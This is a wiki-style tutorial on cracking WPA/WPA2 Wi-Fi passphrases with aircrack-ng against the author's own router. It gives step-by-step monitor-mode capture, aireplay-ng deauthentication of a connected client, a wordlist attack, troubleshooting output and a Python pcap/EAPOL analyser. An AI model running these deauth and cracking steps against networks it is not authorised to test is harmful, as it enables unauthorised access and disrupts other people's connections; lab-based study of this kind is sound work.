From charlesreid1

Now that we've successfully walked through using Aircrack to crack WEP on our home router on the Aircrack/WEP Cracking page, let's try attacking the router in WPA encrypted mode.

Notes on wireless in Kali 2.0: Kali_2.0/Wireless_Debugging

The Background

As with the WEP attack we covered, this attack uses aircrack-ng to capture as many handshake packets as possible, then uses those packets to guess the wireless network's passphrase by brute force against a wordlist.

WPA or WPA2?

From here:

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

Here's what the security settings page might look like:

[Image: WirelessRouterWPAWPA2.png, the router's wireless security settings page]

The Hardware

The hardware for simulating this attack on my home network consisted of:

  • a router/wireless access point - this router controls the wireless network being attacked
  • a laptop running Kali Linux - this is where the attack is being launched from
  • a third party on the network (e.g., a phone or a desktop) - not sure if this is necessary

The Software

You'll need a laptop running Kali, which will have aircrack-ng installed. That should be all the software you need.

The Procedure

Set Your Router to WPA

Before doing anything else, we'll change the wireless security protocol of the router to either WPA or mixed WPA/WPA2 encryption.

Now let's pick an easy password, for the sake of example. Like, uh, the word password.

Now we've got our WPA/WPA2-enabled router with our super-secure password of "password" - time to get to work.

Change Your Mac Address

See Kali/Change Mac Address

Check Wireless Devices

Now that you have your WPA/WPA2 network enabled, open up your Kali laptop. Check the wireless devices available on the computer:

$ iwconfig

Once again, we'll be using the Panda Wireless USB dongle at wlan2.

Switch Wireless Device to Monitor Mode

Now use airmon-ng (part of the aircrack-ng suite) to put the wireless device into monitor mode:

$ airmon-ng start wlan2

This will take wlan2 down and replace it with wlan2mon.

Now we're ready to scan available networks and find our WPA/WPA2 router.

Scan Networks

Now you can scan the wireless access points around you by running:

$ airodump-ng wlan2mon

Make a note of your target router's channel number and MAC address.

Begin the Attack

Window 1: Monitor Traffic on the Network

In the first window, monitor traffic going to/from the target router by running a more targeted airodump-ng:

$ airodump-ng -d AA:BB:CC:DD:EE:FF -c XX -w aircrack_output wlan2mon

or,

$ airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel XX -w aircrack_output wlan2mon

Make sure you've killed the earlier airodump-ng command, which was hopping channels, or this command will not work. Here AA:BB:CC:DD:EE:FF is the target router's MAC address (BSSID) and XX is its channel number, both from the scan above.

Find the Sheep

The weakness we're taking advantage of in WPA is the handshake process: when a client (an unsuspecting sheep) authenticates with the network, it sends the encrypted password so the network can verify the client. If an attacker captures packets during this handshake process, they have the encrypted password and can try to crack the sheep's passphrase by brute force.

That means we need to find a sheep that will broadcast their passphrase to the router and anyone else who will listen. So once you're ready, and listening to the network, connect your sheep to the network. (This might be a computer playing internet radio, for example.)

Window 2: Deauthenticate Sheep

The next step is to deauthenticate the sheep.

In window 2, we'll use aireplay to craft deauth packets and send them to the sheep:

$ aireplay-ng -0 1 -a <access point mac address> -c <sheep mac address> wlan2mon

or,

$ aireplay-ng --deauth 1 -a <access pt mac addr> -c <sheep mac addr> wlan2mon

This will generate fake deauthentication packets and send them to the sheep. The sheep will think it has been deauthenticated and kicked off the network. Lonely and desperate and bleating madly, the sheep will begin to broadcast its packets to anyone who will listen - including its encoded passphrase.

If we're listening, we can hear it, and use Aircrack to crack it.

This is attack mode 0 (-0 / --deauth) in the aireplay-ng manual, part of the aircrack-ng suite.

Finish the Attack

Aircrack/Cracking

Now we've got what we need in our network capture file. Let's try and crack this password.

You can use whatever you want for your wordlist; if you're attacking a network with a known passkey, just make sure the passkey is in there. I downloaded a list of the 10,000 most common passwords ("password" is number one on the list) from SecLists on GitHub.

Now run Aircrack against the captured data to crack the WPA key, specifying the wordlist:

$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap 

and, if you're lucky, you'll see something like this:


                                 Aircrack-ng 1.2 rc2


                   [00:00:00] 5 keys tested (669.62 k/s)


                           KEY FOUND! [ password ]


      Master Key     : 8A D8 38 DD C7 05 39 9F 02 DE 96 0F 98 E1 C2 EF 
                       01 D0 A8 C4 75 C9 4A C3 04 32 E8 21 53 9E D5 1A 

      Transient Key  : FC BB DD FE 34 37 AC 42 D6 15 06 70 0A 2A 6B B0 
                       D6 1C 6A 5C 3B 1D EE 40 C8 20 10 D1 7C 0F 5B A2 
                       5A 92 8A 70 E6 36 2C DA 3E 36 6E CB AE F1 1B FC 
                       78 C5 54 82 BA 84 3F DE 2D 7A BD A0 BD E0 40 AB 

      EAPOL HMAC     : 84 B2 3D 30 2D A0 87 D1 A3 2A AC 14 71 28 B5 82 

Troubleshooting

Passphrase Not Found

This was the first result I saw, when I tried to crack my wireless password "password" with a wordlist that had "password" right there at the top:

$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap 

Opening aircrack_output-05.cap
Read 81013 packets.

   #  BSSID              ESSID                     Encryption

   1  74:85:2A:97:5B:08  Walrus                    WPA (1 handshake)

Choosing first network as target.

Opening aircrack_output-05.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc2


                   [00:00:00] 192 keys tested (1269.55 k/s)
                   [00:00:00] 392 keys tested (1287.03 k/s)
                       Current passphrase: cadillac
                   [00:00:00] 592 keys tested (1298.17 k/s)
                       Current passphrase: mariners
                   [00:00:00] 788 keys tested (1293.03 k/s)
                       Current passphrase: commando
                   [00:00:00] 988 keys tested (1293.68 k/s)
                       Current passphrase: films+pic+galeries
                   [00:00:00] 1188 keys tested (1297.01 k/s)
                       Current passphrase: vikings1
                   [00:00:01] 1384 keys tested (1298.15 k/s)
                       Current passphrase: hotmail1
                   [00:00:01] 1580 keys tested (1298.30 k/s)
                       Current passphrase: aviation
                   [00:00:01] 1776 keys tested (1298.07 k/s)
                       Current passphrase: riffraff
                   [00:00:01] 1964 keys tested (1293.49 k/s)
                       Current passphrase: smirnoff
                       Current passphrase: skeeter1

Passphrase not in dictionary

Quitting aircrack-ng...

Oh?

Possible Failure Points

Aircrack can only crack pre-shared keys (PSK). Is my wireless network listed as having PSK? Yes. (AUTH column in airodump-ng)

Aircrack can only handle dictionary words and short passphrases. Is my test router's password too hard? Pretty sure that if a password cracker can't crack a password of "password," it is an abject failure.

Not letting it run long enough? I suspect this may be the issue.

Problems with packet injection? No, everything looks okay. Here are Aircrack/Packet Injection Testing notes.

Something peculiar about my network? Possibly. Almost definitely. Successful on two other different wireless router makes/models.

Wireshark for Troubleshooting

You can use Wireshark to analyze some of these packet captures. From this site: "Use Wireshark and apply a filter of 'eapol'. This displays only eapol packets you are interested in. Thus you can see if capture contains 0, 1, 2, 3 or 4 eapol packets."

From this page comes a great explanation of how to analyze those packets.

On the first successful network, filtering for eapol packets shows that we had four different sources, which took about 10 minutes to capture.

On the second successful network, filtering eapol packets shows three different sources, and those took about 15 minutes to capture.

On the network setup that is failing, filtering eapol packets shows eapol packets coming from a single destination, despite an hour of capturing packets.

On another (failed) attempt against a network that was later successfully attacked, we had only two sources of eapol packets.

All in all, this means you may need multiple clients on the network - as I observed, the important thing is not having a lot of traffic but having a lot of clients connected and sending EAPOL packets.
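The EAPOL check the page describes in Wireshark can be done offline, and the same pass over the capture can count the deauthentication frames from the aireplay-ng step. The following is an added example (standard-library Python; not code from this page or from the aircrack-ng project) that reads a classic pcap of 802.11 frames, counts deauthentication frames per BSSID, and records which of the four handshake messages appear for each (AP, client) pair, classified from the EAPOL-Key key_info flags: Ack without MIC is message 1, MIC without Ack is message 2 (or message 4 once the Secure bit is set), and Ack+MIC+Install is message 3. It assumes link type 105 (assumed to be what airodump-ng writes) or 127 (radiotap); the constructed sample capture uses the BSSID from the page's own aircrack-ng output together with made-up client addresses.

```python
"""Inspect an airodump-ng style .cap file offline: count deauthentication frames
per BSSID and record which 4-way handshake messages were seen per (AP, client).
Added example (standard library only), not code from the aircrack-ng project."""
import struct
from collections import defaultdict

DLT_IEEE802_11 = 105            # link type airodump-ng writes (assumed)
DLT_IEEE802_11_RADIOTAP = 127   # link type most Wireshark/tcpdump captures use
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"  # LLC/SNAP + ethertype 0x888E
KEY_INFO_INSTALL, KEY_INFO_ACK, KEY_INFO_MIC, KEY_INFO_SECURE = 0x40, 0x80, 0x100, 0x200


def mac(raw):
    return ":".join(f"{b:02X}" for b in raw)


def pcap_records(data):
    """Yield (link_type, frame) for every record of a classic (non-pcapng) pcap."""
    magic, = struct.unpack_from("<I", data, 0)
    end = "<" if magic == 0xA1B2C3D4 else ">"
    link_type, = struct.unpack_from(end + "I", data, 20)
    off = 24
    while off + 16 <= len(data):
        incl_len, = struct.unpack_from(end + "I", data, off + 8)
        off += 16
        yield link_type, data[off:off + incl_len]
        off += incl_len


def handshake_message(key_info):
    """Map EAPOL-Key key_info flags to 4-way handshake message number 1..4."""
    ack, mic = key_info & KEY_INFO_ACK, key_info & KEY_INFO_MIC
    if ack and not mic:
        return 1                                   # AP -> STA: ANonce
    if ack and mic and key_info & KEY_INFO_INSTALL:
        return 3                                   # AP -> STA: ANonce + GTK, MIC
    if mic and not ack:
        return 4 if key_info & KEY_INFO_SECURE else 2  # STA -> AP: SNonce+MIC / confirm
    return None


def analyze(data):
    """Return ({bssid: deauth_count}, {(bssid, sta): sorted message numbers})."""
    deauth, handshakes = defaultdict(int), defaultdict(set)
    for link_type, frame in pcap_records(data):
        if link_type == DLT_IEEE802_11_RADIOTAP:
            frame = frame[struct.unpack_from("<H", frame, 2)[0]:]  # strip radiotap
        elif link_type != DLT_IEEE802_11:
            continue
        if len(frame) < 24:
            continue
        fc0, fc1 = frame[0], frame[1]
        ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
        addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
        if ftype == 0 and subtype == 12:           # management frame, deauthentication
            deauth[mac(addr3)] += 1                # addr3 is the BSSID
            continue
        if ftype != 2 or fc1 & 0x40:               # only unprotected data frames
            continue
        body = frame[24 + (2 if subtype & 0x8 else 0):]   # QoS data adds 2 bytes
        if len(body) < 15 or body[:8] != LLC_SNAP_EAPOL or body[9] != 3:
            continue                               # not an EAPOL-Key packet
        key_info, = struct.unpack_from(">H", body, 13)   # after descriptor type byte
        msg = handshake_message(key_info)
        if msg is None:
            continue
        bssid, sta = (addr2, addr1) if fc1 & 0x02 else (addr1, addr2)  # FromDS?
        handshakes[(mac(bssid), mac(sta))].add(msg)
    return dict(deauth), {k: sorted(v) for k, v in handshakes.items()}


def complete_handshakes(handshakes):
    """Pairs for which all four messages were captured."""
    return sorted(k for k, msgs in handshakes.items() if msgs == [1, 2, 3, 4])


def _frame(fc0, fc1, a1, a2, a3, body):
    return bytes([fc0, fc1, 0, 0]) + a1 + a2 + a3 + b"\x00\x00" + body


def _eapol_key(key_info):
    payload = b"\x02" + struct.pack(">H", key_info) + b"\x00" * 92  # RSN descriptor, zeroed
    return LLC_SNAP_EAPOL + b"\x02\x03" + struct.pack(">H", len(payload)) + payload


def build_sample_pcap():
    """Constructed capture: a 5-frame deauth burst, one complete handshake with
    client 'sheep', and a second client for which only message 1 was ever seen."""
    ap = bytes.fromhex("74852A975B08")                 # BSSID shown on this page
    sheep, other = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")  # made up
    key_info = {1: 0x008A, 2: 0x010A, 3: 0x13CA, 4: 0x030A}   # typical WPA2 flag values
    def from_ap(sta, n): return _frame(0x08, 0x02, sta, ap, ap, _eapol_key(key_info[n]))
    def to_ap(sta, n): return _frame(0x08, 0x01, ap, sta, ap, _eapol_key(key_info[n]))
    frames = [_frame(0xC0, 0x00, sheep, ap, ap, b"\x07\x00")] * 5   # deauth, reason code 7
    frames += [from_ap(sheep, 1), to_ap(sheep, 2), from_ap(sheep, 3), to_ap(sheep, 4)]
    frames += [from_ap(other, 1)]                      # AP kept sending M1, no reply
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, DLT_IEEE802_11)
    return header + b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)


if __name__ == "__main__":
    deauth, hs = analyze(build_sample_pcap())
    for bssid, n in deauth.items():
        print(f"{bssid}: {n} deauthentication frames")
    for (bssid, sta), msgs in hs.items():
        print(f"{bssid} <-> {sta}: handshake messages {msgs}")
    print("complete handshakes:", complete_handshakes(hs))
```

A pair that only ever shows message 1 is what the failing capture above looks like through the eapol filter: the AP keeps offering its ANonce, but no client answers, so there is no SNonce and no client MIC, and nothing for aircrack-ng to test a candidate passphrase against. The deauthentication counter is the defensive half of the same picture: a burst of deauth frames aimed at one client, carrying the AP's own address, is the on-air signature of the aireplay-ng -0 step, and it is what 802.11w (Protected Management Frames) exists to make the client ignore.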

TL;DR

Alright, smartass, here you go:

$ airmon-ng # list wireless devices
$ airmon-ng start wlan2 # put wlan2 in monitor mode
$ airodump-ng wlan2mon # scan for access points, note the target's BSSID and channel
$ airodump-ng --bssid AA:BB:CC:DD:EE:FF -c XX -w aircrack_output wlan2mon # capture packets from target network
$ aircrack-ng -w ./wordlist.txt aircrack_output-01.cap # crack the passphrase